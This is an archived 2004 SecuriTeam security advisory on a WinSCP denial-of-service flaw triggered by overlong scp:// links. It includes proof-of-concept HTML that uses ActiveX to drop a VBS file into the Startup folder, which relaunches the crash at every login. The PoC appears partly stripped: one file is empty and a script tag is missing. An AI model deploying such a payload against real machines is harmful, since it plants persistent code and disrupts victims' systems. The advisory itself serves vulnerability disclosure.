[NT] WinSCP Denial of Service

From: SecuriTeam (support_at_securiteam.com)
Date: 04/15/04

Next message: SecuriTeam: "[UNIX] KPhone STUN DoS (Malformed STUN Packets)"

Previous message: SecuriTeam: "[UNIX] Multiple Vulnerabilities in Tiki CMS/Groupware"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 15 Apr 2004 19:39:40 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

WinSCP Denial of Service
------------------------------------------------------------------------

SUMMARY

<http://winscp.sourceforge.net> WinSCP is "an open source SFTP (SSH File
Transfer Protocol) and SCP (Secure CoPy) client for Windows using SSH
(Secure SHell). Its main function is safe copying of files between a local
and a remote computer". A malicious attacker can send an email containing
a link that will cause WinSCP to crash.

DETAILS

Vulnerable Systems:
* WinSCP version 3.5.6 (prior versions might be also vulnerable)

The default installation of WinSCP provides the user with functionality to
handle sftp:// and scp:// addresses. The vulnerability exists due to the
way the application handles long URL's. A malformed scp:// or sftp://
address embedded in a HTML tag causes the WinSCP application to exhaust
CPU and Memory resources. The attacker would need the ability to convince
the user to visiting a web site he controlled or opening an HTML e-mail he
had prepared. During the denial of service, WinSCP will not display any
GUI.

Proof of Concept:
------ WinSCP_DoS1.html --------

<HTML>
<HEAD>
<TITLE>WinSCP DoS</TITLE>

</HEAD>
<BODY>
</BODY>
</HTML>

-------- WinSCP_DoS2.html -------

<html>
<head>
<title>WinSCP DoS</title>

var WshShell = new ActiveXObject("WScript.Shell");
strSU = WshShell.SpecialFolders("StartUp");

var fso = new ActiveXObject("Scripting.FileSystemObject");
var vibas = fso.CreateTextFile(strSU + "\\WinSCPDoS.vbs",true);

     vibas.WriteLine("Dim shell");
     vibas.WriteLine("Dim quote");
     vibas.WriteLine("Dim DoS");
     vibas.WriteLine("Dim param");
     vibas.WriteLine("DoS = \"C:\\Programmi\\WinSCP3\\WinSCP3.exe\"");
     vibas.WriteLine("param = \"scp://AAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"");
     vibas.WriteLine("set shell =
WScript.CreateObject(\"WScript.Shell\")");
     vibas.WriteLine("quote = Chr(34)");
     vibas.WriteLine("pgm = \"explorer\"");
     vibas.WriteLine("shell.Run quote & DoS & quote & \" \" & param");

vibas.Close();

</script>

</head>
</html>

ADDITIONAL INFORMATION

The information has been provided by <mailto:luca.e@seeweb.it> Luca
Ercoli.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Next message: SecuriTeam: "[UNIX] KPhone STUN DoS (Malformed STUN Packets)"

Previous message: SecuriTeam: "[UNIX] Multiple Vulnerabilities in Tiki CMS/Groupware"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

[NT] WinSCP URL Protocol Handler Flaw
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... WinSCP URL Protocol Handler Flaw ... automatically download files from a remote server to the local system. ... 24-Jul-2007 Vulnerability reported to Martin Prikryl ...
(Securiteam)
[NT] WinSCP - URI Handler Spoofing
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... WinSCP - URI Handler Spoofing ... execute arbitrary files without user intervention. ... or they may download executables to a location ...
(Securiteam)
[NT] Netegrity SiteMinder smpwservicescgi.exe Target Redirection
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Due to improper filtering of user provided data, a remote attacker can ... This allows an attacker to redirect the user to whatever site ...
(Securiteam)
[NT] WebArchiveX Unsafe Methods Vulnerability
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... String userAgent, ... scripting' entry, but unfortunately has not changed the version number. ...
(Securiteam)
[NEWS] IBM Net.Data Macro Name Cross-Site Scripting Vulnerability
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The vulnerability is caused due to an input validation error in the db2www ... The vendor recommends that the "DTW_DEFAULT_ERROR_MESSAGE" feature (or ...
(Securiteam)